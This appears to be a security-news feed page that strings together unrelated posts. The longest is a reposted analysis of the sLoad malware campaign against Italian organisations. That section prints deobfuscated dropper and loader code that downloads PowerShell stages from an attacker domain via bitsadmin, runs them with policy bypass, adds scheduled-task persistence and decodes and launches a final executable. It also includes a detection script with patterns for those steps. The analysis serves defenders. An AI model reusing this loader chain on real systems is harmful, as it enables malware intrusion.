We’ve come to the end of our list of free VPN apps for Android. Many providers say many things about their products; however, when we tested them, some claims amounted to nothing in performance. We offer these seven apps because they are reliable and credible. Moreover, we tested each of them, so we know how each performs.


Threat Roundup for September 27 to October 4

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sept. 27 and Oct. 4. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, it summarizes the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10042019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

#VB2019: Time For an Ethical Debate on Cyber Moral Decisions


Morals and ethics should be considered when it comes to making decisions in cybersecurity.

Speaking at the Virus Bulletin 2019 conference in London, Ivan Kwiatkowski, security researcher at Kaspersky Lab, said that there are not a lot of discussions on ethics in cybersecurity: the concept of white hat versus black hat is “the wrong way to think about things”, and even the subject of ethical hacking rarely covers the issue of ethics.

Saying he was talking to people “who were thinking of doing something terrible but had not stopped to think about it yet,” he said that this is a young industry and we have not developed a moral compass yet; it is not an issue of maturity or diversity, but people rely on their personal intuition for the decisions that they face.

“Nobody wants someone to tell them right from wrong” he added, but he urged people to realize that “knowledge is power and if you control what people know about something, you can convince people.

“Infosec is about controlling what access people have to certain information.” He said that there are ethical dilemmas that people may face, such as:

  • A legitimate hacking problem – that intelligence agencies and military attack organizations, and some nations set up a “surveillance apparatus which can be invaluable in preventing terrorism,” whilst others rely on “hacking back”, and some people carry the term of hacktivist and feel justified in hacking something or someone
  • Vulnerability handling – when we find a vulnerability, Kwiatkowski said that we still need to reach an agreement on how to handle vulnerabilities. Some companies specialize in selling hacking tools and exploits, and swear that they only do business with governments with a good track record of democracy and human rights. However, he argued: “In some cases, there have been suspect decisions in that regard”

In the case of exploits being sold on the offensive market, he asked if it is a legal or moral issue, as moral decisions change over time. “All cultures may disagree on what morals are, we all have a moral code and maybe those questions are unsolvable and unescapable.”

He went on to say that we “owe it to ourselves” to determine what constitutes ethical behavior and what does not. Concluding, he recommended “allocating more attention to ethics” and said that it was time we adopted a global code of conduct too, and cited the EFF as being able to push that standard.

He also called on conference organizers to consider this, and to concentrate less on celebrities, “especially those celebrities whose success may be traced back to suspicious behavior”; instead, he recommended that conference organizers invite philosophers and “victims of cyber-abuse to tell their stories” to let us know our shortcomings.

Using CESA to Solve Endpoint Blindness for a World Class InfoSec Team

Cisco has an amazing set of products like AMP for Endpoints and Cisco Umbrella protecting devices from advanced malware threats.  There were other user and endpoint scenarios that remained unsolved until we introduced the new Cisco Endpoint Security Analytics (CESA) solution that was recently announced.  CESA provides an unprecedented level of endpoint and user networking visibility built on Cisco AnyConnect Network Visibility Module (NVM) endpoint telemetry and Splunk Enterprise.   Underlying the NVM technology is a protocol called nvzFlow (en-vizzy-flow) that I have blogged about in the past.


Why Did We Build CESA?

The CESA solution was originally developed by the Office of the Security CTO and then integrated into Cisco AnyConnect and Splunk products to solve a set of issues for Cisco InfoSec.  Cisco InfoSec realized that getting all the endpoint visibility they needed to perform incident response was a challenge. There were also endpoint security blind spots as more Cisco employees were working off premise and connecting to both enterprise and cloud resources.  They needed a way to collect and store a year of data for analysis of incidents while also getting information in real‑time to see what is happening in the network.  You can read more about the Cisco InfoSec use case in their case study on CESA.

The Office of the Security CTO looks at current and future customer problems that are not being solved by existing technology and then comes up with ideas on how to solve them.  My fellow co-inventors, Andrew Zawadowskiy and Donovan O’Hara from the CTO Advanced Development team, built the initial Proof of Concept and then worked on the final product release with the AnyConnect development team.

As we thought about ways to solve the problems Cisco InfoSec was facing, we wanted to do it in a way that built on standards technology so that not only could Cisco Stealthwatch and Cisco Tetration support it, but it would also provide an ecosystem for key partners to participate.  This is why we chose to build on IPFIX.  It is the perfect protocol to build the enhanced context found in nvzFlow.  What do we mean by “Enhanced Context”?

The 5 key endpoint visibility categories conveyed by the protocol or “Enhanced Context” are:

  • User
  • Device
  • Application
  • Location
  • Destination

At the end of the blog will be a helpful table to show you details of the enhanced context that is provided.

Working with Great Partners like Splunk and Samsung

One of the key features of CESA is Splunk Enterprise, which performs the analytics and alerting on the NVM telemetry, turning it into actionable events. The new CESA Built on Splunk product, available exclusively from Cisco, provides a Splunk package customized and priced specifically for analyzing NVM telemetry.  Cisco InfoSec has been using the CESA solution for over two years now.  As noted earlier, you can read more about it in their Case Study.

Splunk Enterprise is a fantastic tool.  It was really easy for us to take the Cisco AnyConnect NVM data and not only import it into Splunk, but also quickly create a high-value set of dashboards and reports from the data.  There are two components in the Splunk store that make up the solution: Cisco AnyConnect Network Visibility Module (NVM) App for Splunk and Cisco NVM Technology Add-on for Splunk.  Because NVM produces so much high-value data, Splunk created a special per-endpoint license available exclusively from Cisco that makes budgeting predictable and saves you money.  We also put together a helpful deployment guide to get you going.

Below is an example of the dozens of reports available in the AnyConnect NVM Splunk Dashboard.
As you can see the solution provides visibility into what applications are connecting to what domains and how much data is being transmitted/received.


From there, you can then drill down on the specific application and obtain finer grained details including the SHA256 hash of the process, the names of domains and IP addresses it connected to, what account it is running under, etc.  Just click on the specific element and it will take you to an investigation page for that observable.

You can easily integrate your favorite investigation tools right into the Splunk Enterprise dashboards.  For example, you can pivot from a DNS domain name observable into Cisco Umbrella, Talos Intelligence or Cisco Threat Response with just a couple lines of HTML.  This will allow you to obtain a threat disposition on the domain.

Similarly, you can take the SHA256 hash observable and pivot right into AMP for Endpoints, ThreatGrid or Cisco Threat Response.  This will allow you to obtain a threat disposition on the binary.

We’ve provided those integrations for you in the default dashboards. You can easily add more just by editing them to include your favorite tools.  Let us know if there is anything else that would be useful in the default screens.


Samsung has been another excellent partner from the start.  We have worked with them closely on their Knox program for a number of years with AnyConnect integrations and neat features like per-app VPN.  When we explained to them what we wanted to do with Cisco AnyConnect NVM, they were excited to help and developed the Network Platform Analytics (NPA) framework to make it possible.  It is the only framework available on mobile platforms to support Cisco AnyConnect NVM.  The best part is that you can enable and provision this capability using your favorite Enterprise Mobility Management (EMM) solution – no special device-mode needed!  Keep an eye out for a forthcoming quick‑start guide on this technology.  NVM is also available on Windows, MacOS and Linux platforms.

Those are some of the high points of the CESA Built on Splunk solution.  If you’d like to get into further technical details on the solution architecture and NVM telemetry itself, see my post on our Cisco Community Page.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) has been the protagonist of increasing and persistent attack waves against the Italian landscape since Q3 2018 and on into 2019 (e.g. N020419, N040619, N010819), but also against the UK and Canada, as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain used to spread additional malware. For this reason, Cybaze-Yoroi ZLAB dissected one of the latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legitimate certified emails (PEC). These recent attack waves were targeting Italian organizations and consultants affiliated with professional associations, such as lawyers and civil engineers. Once again, the attachment is a malicious zip.

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such as the code appended to the archive in past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first is designed to deceive the unaware user and lure them into opening the runnable script.

The following tables show some basic information about the samples contained in the zip archive.

Hash: 30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat: .vbs dropper
Brief Description: SLoad Visual Basic script loader
Ssdeep: 192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash: 43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat: .pdf file
Brief Description: SLoad corrupted pdf file
Ssdeep: 1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper reveals an obfuscated script containing several junk instructions, such as unused variables and commented-out code. After a deobfuscation phase, the inner logic becomes visible. The purpose of this script is to launch a powershell script retrieved from the attacker's infrastructure and, in the meantime, to decoy the victim.

    On Error Resume Next
    Set ZCzG = CreateObject("Scripting.FileSystemObject")
    Set PavfQt = WScript.CreateObject("WScript.Shell")
    ' Decoy: walk C:\Users\ and open every PDF found with explorer
    Set XaiX = ZCzG.GetFolder("c:\Users\")
    Recurse(XaiX)
    ' Fetch the fake "jpg" (really a PowerShell script) with the native BITS client
    PavfQt.run "bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",0,True
    ' Poll every 2.28 seconds until the download has landed on disk
    i=0
    Do While i < 1
        If (ZCzG.FileExists("c:\Users\Public\Downloads\RSbYHuPO.ps1")) Then
            i=1
        End If
        WScript.Sleep(2280)
    Loop
    ' Run the downloaded script with the execution policy bypassed and a hidden window
    PavfQt.run "powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",0,True
    Sub Recurse(JFLY)
        If IsAccessible(JFLY) Then
            For Each oSubFolder In JFLY.SubFolders
                Recurse oSubFolder
            Next
            For Each RIst In JFLY.Files
                If InStr(RIst.Name,".pdf") > 0 Then
                    PavfQt.run "explorer "+JFLY+"\"+RIst.Name
                End if
            Next
        End If
    End Sub
    Function IsAccessible(XaiX)
        On Error Resume Next
        IsAccessible = (XaiX.SubFolders.Count >= 0)
    End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the “bitsadmin.exe” tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allows the script to stay under the radar of several AV controls. The fake jpg actually contains a powershell script.

    $oLZz2= "C:\Users\admin\AppData\Roaming";
    $YwbpkcN9XUIv1w=@(1..16);
    […]
    # Encrypted configuration blobs dropped next to the loader
    $main_ini='76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA';
    $main_ini | out-file $PaIQGLoo'\main.ini';
    $domain_ini='76492d1116743f0423413b1605 […] YwBlAA==';
    $domain_ini | out-file $PaIQGLoo'\domain.ini';
    […]
    try{ […]
    }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
    # Proceed only when fewer than two powershell processes are running
    if ($yC0iBerAupzdtf5Z.length -lt 2){
    $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
    $r=8;
    $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
    $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
    $sv8eJJhgWV3xAN7Uu=@(1..16);
    # Decrypt main.ini with the static key 1..16 and execute the plaintext
    $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
    $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
    $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
    $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
    Invoke-Expression $DBR4S3t;
    }
    } | out-file $PaIQGLoo'\'$H3z9RnzIihO8'.ps1'
    # Persistence: a scheduled task every 3 minutes that runs the dropped .tmp VBScript
    $OFHc0H4A=' /F /create /sc minute /mo 3 /TN "S'+$rs+$fLCg9ngJqRHX36hfUr+'" /ST 07:00 /TR "wscript /E:vbscript '+$PaIQGLoo+'\'+$JxdRWnHC+'.tmp"';
    start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script takes is to set a scheduled task to gain persistence on the infected machine. Then, after selecting a random active process on the infected machine (“System” in this specific infection) and concatenating its name with the “%AppData%\Roaming” path, it stores four different files in its installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”) are encrypted using the “ConvertFrom-SecureString” native function. Then, the script runs the “UoqOTQrc.tmp” file, whose only purpose is to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”

    Dim str, min, max
    Const LETTERS = "abcdefghijklmnopqrstuvwxyz"
    min = 1
    max = Len(LETTERS)
    Randomize
    […]
    Set objFSO=CreateObject("Scripting.FileSystemObject")
    Set winssh = WScript.CreateObject("WScript.Shell")
    ' Random names for the helper file and its variables
    fName=RandomString(10)
    JAcalshy=RandomString(4)
    fZgxNPDMnu=RandomString(4)
    WEHxctVdTEoDfqEqJMP=RandomString(4)
    […]
    ' Write three "Set" lines with random variable names to the output file
    Set objFile = objFSO.CreateTextFile(outFile,8, True)
    objFile.Write "Set "+JAcalshy+"=rshe" & vbCrLf
    objFile.Write "Set "+fZgxNPDMnu+"=ypa" & vbCrLf
    objFile.Write "Set "+WEHxctVdTEoDfqEqJMP+"=il" & vbCrLf
    objFile.Close
    ' Launch the companion .ps1 (name elided in the sample) with the execution policy bypassed
    winssh.run "powershell -ep bypass -file .ps1",0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

    try{
    # Junk cmdlet pairs: the try block is meant to throw and land in catch
    Remove-EventLog:Debug-Job
    Export-BinaryMiLog:Get-PSSessionConfiguration
    Remove-JobTrigger:New-Item
    }catch{
    $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
    if ($yC0iBerAupzdtf5Z.length -lt 2){
    $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
    $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
    $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
    $sv8eJJhgWV3xAN7Uu=@(1..16);
    # Same decrypt-and-evaluate routine as the downloaded stage, keyed with 1..16
    $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
    $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
    $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
    $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
    Invoke-Expression $DBR4S3t;
    }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “main.ini” file using the “ConvertTo-SecureString” function (the inverse of the “ConvertFrom-SecureString” call that produced it) and the encryption key contained in the “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array.

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated by selecting three ASCII char-codes in the ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini”, it is possible to spot that the script also grabs system information to check in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrated by the malware, before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

    $u2K2MQ4 = "`r`n"
    # Random 8-letter name for the dropped .tmp/.ps1 pair
    $lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
    $yIXgWSaXsKD5hanf9uO= $env:userprofile+'\App'+'Da'+'ta\Ro'+'am'+'ing';
    $hh='hi'+'dd'+'en';
    $ixXApGeqJKEGY=@(1..16);
    # Installation folder named after the first 6 characters of the machine UUID
    $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
    $Erlydj = $Erlydjiyy.UUID;
    $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
    $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
    If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
    # Guard: stop if "_in" was written less than 30 minutes ago, otherwise re-mark it
    If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";
    try{ Remove-Item $Z5lTNXB'\*'}catch{}
    # Encrypted config.ini and web.ini blobs, assembled from chunks
    $wsxDITPgQCH+='76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA';
    […]
    $wsxDITPgQCH+='UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA';
    $wsxDITPgQCH+='3ADAANQA1AA==';
    $wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
    $5r8DcJB4ok4+='76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA';
    […]
    $5r8DcJB4ok4+='YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA';
    $5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
    # Disable a task named GoFast, then register the new minute-interval task
    start-process -windowstyle $hh schtasks '/change /tn GoFast /disable';
    $2aWxu9dutZfOPCCgS+=$u2K2MQ4+'Dim ';
    […]
    $nz0oninX6=$ixXApGeqJKEGY -join ',';
    $E6M6Np8nhXnu4ndPEJ=' /F /create /sc minute /mo 3 /TN "U'+$sOmUGoc0ysV8UW+'" /ST 07:00 /TR "wscript /E:vbscript '+$Z5lTNXB+'\'+$lNlNrKyk+'.tmp"';
    start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

    $u2K2MQ4 = "rn";
    $lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
    $yIXgWSaXsKD5hanf9uO= $env:userprofile+'\AppData\Roaming';
    $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
    $Erlydj = $Erlydjiyy.UUID;
    $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
    $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
    If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
    If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";
    try{ Remove-Item $Z5lTNXB'\*'}catch{}
    $wsxDITPgQCH="76492d1 […] A1AA==";
    $wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
    $5r8DcJB4ok4="7649 […] AGIA";
    $5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
    start-process -windowstyle hidden schtasks '/change /tn GoFast /disable';
    # The .tmp launcher and the .ps1 decrypt-and-evaluate stage are written as plain text
    $2aWxu9dutZfOPCCgS="Dim winssh […] winssh.run "powershell -ep bypass -file vJjFwtSM.ps1",0,true";
    $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB'\'$lNlNrKyk'.tmp'
    $r1uIiPZBhUea0=" $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}";
    $r1uIiPZBhUea0 | out-file $Z5lTNXB'\'$lNlNrKyk'.ps1'
    $nz0oninX6="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16";
    $E6M6Np8nhXnu4ndPEJ="/F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp";
    start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like the previous script, this one performs the same operations and creates another four files in the “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”

  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of the “<random_name>.ps1” file is the following. The latter script decrypts the content of the “config.ini” file. The following figure shows both the encrypted and the decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operations described for the “main.ini” file but uses different URLs, stored in the “web.ini” file. This time too, the file is decrypted using an integer array from 1 to 16 as the key, contained in the “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seemed to be down, so we were not able to identify the final payload family.

    $dPath = [Environment]::GetFolderPath("MyDocuments")
    $jerry=$starsLord+'\'+$roccon+'_'+$rp;
    # Fetch the payload with bitsadmin, base64-decode it with certutil into Documents, then start it
    $clpsr='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dPath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$roccon+'_'+$rp+'.exe" & exit';
    start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
    # Clean up the intermediate files and the dropped executable
    $clpsr='/C del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dPath+'\'+$roccon+'_'+$rp+'.exe & exit';
    start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload
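Added here as a defender's example, not code from the Yoroi analysis or Security Affairs: a small Python triage script that scans process-creation records for the LOLBin steps of this chain (bitsadmin writing an image-named download as a script, powershell -ep bypass on a file under Public\Downloads, a minute-interval schtasks entry running wscript /E:vbscript on a .tmp, certutil -decode feeding start-process) and then correlates distinct steps per host, since a lone bitsadmin or schtasks call is routine. The pipe-separated record format, hostnames, paths and the example.invalid domains are constructed for the example.

```python
"""Triage of process-creation telemetry for the sLoad chain described above.

Added example, not code from the Yoroi/CERT-PA analysis. Assumes a constructed
pipe-separated record 'timestamp|host|image|command_line'; adapt parse_line()
to your EDR or Sysmon (Event ID 1) export. Hostnames, paths and the
example.invalid domains in SAMPLE_LOG are constructed placeholders.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# One rule per LOLBin step visible in the snippets above:
#  - bitsadmin fetching an image-named file that is written to disk as a script
#  - powershell -ep bypass -file on a script under Public\Downloads
#  - schtasks creating a minute-interval task that runs wscript /E:vbscript on a .tmp
#  - certutil -decode producing an .exe that is started in the same command line
RULES = [
    ("sload_bitsadmin_image_to_script",
     re.compile(r"bitsadmin\s+/transfer\b.*\.(?:jpe?g|png|gif)\s+\S+\.(?:ps1|vbs|txt)\b", re.I)),
    ("sload_powershell_public_downloads",
     re.compile(r"powershell(?:\.exe)?\s.*-e(?:xecutionpolicy|p)\s+bypass\s.*-file\s+\S*public[\\/]downloads[\\/]", re.I)),
    ("sload_schtasks_wscript_tmp",
     re.compile(r"schtasks\s.*/create\b.*/sc\s+minute\s+/mo\s+\d+\b.*wscript\s+/E:vbscript\s+\S+\.tmp", re.I)),
    ("sload_certutil_decode_then_exec",
     re.compile(r"certutil\s+-decode\s+\S+\s+\S+\.exe\b.*start-process", re.I)),
]


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str
    rule: str
    command_line: str


def parse_line(line):
    """Split one record into (timestamp, host, image, command_line)."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        raise ValueError(f"malformed record: {line!r}")
    return tuple(p.strip() for p in parts)


def scan(lines):
    """Return one Finding per (record, rule) match; a record may trip several rules."""
    findings = []
    for line in lines:
        timestamp, host, _image, cmd = parse_line(line)
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(timestamp, host, name, cmd))
    return findings


def hosts_with_chain(findings, min_rules=2):
    """Keep hosts on which at least min_rules distinct chain steps fired.

    A lone bitsadmin or schtasks call is routine administration; several
    steps of this chain on the same host within one export are not.
    """
    per_host = defaultdict(set)
    for f in findings:
        per_host[f.host].add(f.rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}


# Constructed records: WS01 replays the chain, WS02/WS03 show benign look-alikes.
SAMPLE_LOG = [
    r"2019-10-04T09:12:01|WS01|wscript.exe|wscript.exe C:\Users\admin\Downloads\attachment.vbs",
    r"2019-10-04T09:12:03|WS01|bitsadmin.exe|bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://c2.example.invalid/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",
    r"2019-10-04T09:12:09|WS01|powershell.exe|powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",
    r'2019-10-04T09:12:10|WS01|schtasks.exe|schtasks /F /create /sc minute /mo 3 /TN "S52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp"',
    r"2019-10-04T09:12:15|WS02|bitsadmin.exe|bitsadmin /transfer WinUpdate /download /priority NORMAL https://updates.example.invalid/patch.msu c:\temp\patch.msu",
    r'2019-10-04T09:13:40|WS01|cmd.exe|cmd /C bitsadmin /transfer a1 /download /priority FOREGROUND https://c2.example.invalid/doc/x2401.jpg C:\Users\admin\AppData\Roaming\52A34D\x_a1.txt & Copy /Z C:\Users\admin\AppData\Roaming\52A34D\x_a1.txt C:\Users\admin\AppData\Roaming\52A34D\x_a1_1.txt & certutil -decode C:\Users\admin\AppData\Roaming\52A34D\x_a1_1.txt C:\Users\admin\Documents\x_a1.exe & powershell -command "start-process C:\Users\admin\Documents\x_a1.exe" & exit',
    r"2019-10-04T10:00:00|WS03|schtasks.exe|schtasks /create /sc daily /tn Backup /tr C:\tools\backup.cmd",
]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.timestamp} {f.host} {f.rule}")
    print("hosts with chain activity:", hosts_with_chain(hits))
```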

Comparison With Previous Chains

To better understand the evolution of the sLoad infection chain, we compared attack attempts observed since 2018 with the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with a zip archive containing two files. In the first case the starting point is a “.lnk” file, and in the second one the chain starts with a “.vbs” script.

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably this technique became more detectable over time, so it could have been deprecated in the latest infection attempts. For both malware variants, the archive contains a legitimate image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins, whereas the latest stages use a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in its core structure; however, the bot now supports new commands such as “Exec” and “Eval”, the latter being able to download further code through the Bitsadmin utility instead of relying directly on the “Net.WebClient” primitive. Also, the “ScreenCapture” function has been removed from the new version of the code, in favor of enhancing the agent's persistence through a scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad keeps evolving its TTPs and represents a vivid threat for the Italian cyber-landscape. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by the Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL-encrypted channels makes detection of this threat difficult for automated systems, and frequently requires analysis skills or high-quality threat intelligence sources to detect and tackle sLoad attack campaigns, which many times target just a single country.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Payment Card Security Incidents Disclosed by Three U.S. Restaurant Chains

Three restaurant chains based in the United States have revealed they suffered security incidents that affected customers’ payment card information. On October 2, three subsidiaries of Focus Brands–Moe’s Southwest Grill, McAlister’s Deli and Schlotzsky’s–published near-identical copies of a security incident notice. These statements revealed that the restaurants had nearly finished investigating security incidents of which […]… Read More

The post Payment Card Security Incidents Disclosed by Three U.S. Restaurant Chains appeared first on The State of Security.

This Week in Security News: How a GIF Can Hack Your Android and Vulnerabilities That Could Put Hospital Networks at Risk

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how smart home devices can be easily hacked and 11 vulnerabilities that could affect medical devices and hospital networks. Also, read about why AI could be vital to your security future and a massive Zynga breach affecting more than 200 million players.

Read on:

In Identity Theft the Target is You!

